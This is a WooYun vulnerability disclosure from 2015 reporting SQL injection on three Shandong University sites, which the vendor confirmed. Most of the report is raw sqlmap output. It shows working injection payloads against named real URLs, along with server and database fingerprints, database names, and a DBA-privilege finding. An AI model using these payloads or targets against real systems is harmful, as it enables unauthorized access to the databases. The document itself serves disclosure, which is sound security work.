山东大学多站SQL注入 | wooyun-2015-0165109| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165109

漏洞标题：山东大学多站SQL注入

漏洞作者：路人甲

提交时间：2015-12-28 13:00

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-28：细节已通知厂商并且等待厂商处理中
2015-12-29：厂商已经确认，细节仅向厂商公开
2016-01-08：细节向核心白帽子及相关领域专家公开
2016-01-18：细节向普通白帽子公开
2016-01-28：细节向实习白帽子公开
2016-02-09：细节向公众公开

简要描述：

山东大学多站SQL注入

详细说明：

1.注入点：http://www.hglx.sdu.edu.cn/article.php?id=764

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=764 AND 5432=5432
    Type: UNION query
    Title: MySQL UNION query (NULL) - 37 columns
    Payload: id=-4328 UNION ALL SELECT 16,16,16,16,16,16,16,16,CONCAT(0x7176706271,0x5744684c69474559504d,0x7178717a71),16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=764 AND (SELECT * FROM (SELECT(SLEEP(100)))PgMm)
---
[09:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11

web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[09:20:38] [INFO] fetching current user
sqlmap got a 302 redirect to 'http://www.hglx.sdu.edu.cn:80/index.php'. Do you want to follow? [Y/n] n
current user:    'sq_hanguoliuxue@%'
available databases [2]:                                                       
[*] information_schema
[*] sq_hanguoliuxue

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=764 AND 5432=5432
    Type: UNION query
    Title: MySQL UNION query (NULL) - 37 columns
    Payload: id=-4328 UNION ALL SELECT 16,16,16,16,16,16,16,16,CONCAT(0x7176706271,0x5744684c69474559504d,0x7178717a71),16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=764 AND (SELECT * FROM (SELECT(SLEEP(100)))PgMm)
---
[09:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11

web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[09:20:38] [INFO] fetching current user
sqlmap got a 302 redirect to 'http://www.hglx.sdu.edu.cn:80/index.php'. Do you want to follow? [Y/n] n
current user:    'sq_hanguoliuxue@%'
available databases [2]:                                                       
[*] information_schema
[*] sq_hanguoliuxue

漏洞证明：

2.注入点：http://yinshi.wh.sdu.edu.cn/show.php?filed_id=72
yinshi.wh.sdu.edu.cn/show.php?filed_id=-72 UNION SELECT ALL 1,2,3,4,5,6,7,8,9

GET parameter 'filed_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Parameter: filed_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: filed_id=72 AND 3076=3076
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: filed_id=-7442 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x68597a6370495452576c,0x7170717171),NULL,NULL,NULL-- 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: filed_id=72 AND (SELECT * FROM (SELECT(SLEEP(100)))pDsO)
---
[09:13:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:13:49] [INFO] fetching current user
current user:    'yinshi@localhost'
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:14:01] [INFO] fetching database names
[09:14:03] [INFO] the SQL query used returns 3 entries
[09:14:04] [INFO] retrieved: information_schema
[09:14:05] [INFO] retrieved: test
[09:14:06] [INFO] retrieved: yinshi
available databases [3]:                                                       
[*] information_schema
[*] test
[*] yinshi

3.注入点：http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1&PageNo=1

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 8948=8948 AND 'tLIT'='tLIT&PageNo=1
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 3405=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3405=3405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'KbrS'='KbrS&PageNo=1
---
[02:45:37] [INFO] testing Microsoft SQL Server
[02:45:42] [INFO] confirming Microsoft SQL Server
[02:46:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

available databases [1]:
[*] EntrolExam

dba权限

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[02:57:21] [INFO] testing if current user is DBA
current user is DBA:    True

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-12-29 09:44

厂商回复：

已通报系统所属单位

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165109

漏洞标题：山东大学多站SQL注入

相关厂商：山东大学

漏洞作者：路人甲

提交时间：2015-12-28 13:00

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165109

漏洞标题：山东大学多站SQL注入

相关厂商：山东大学

漏洞作者： 路人甲

提交时间：2015-12-28 13:00

修复时间：2016-02-09 23:29

公开时间：2016-02-09 23:29

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0165109"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云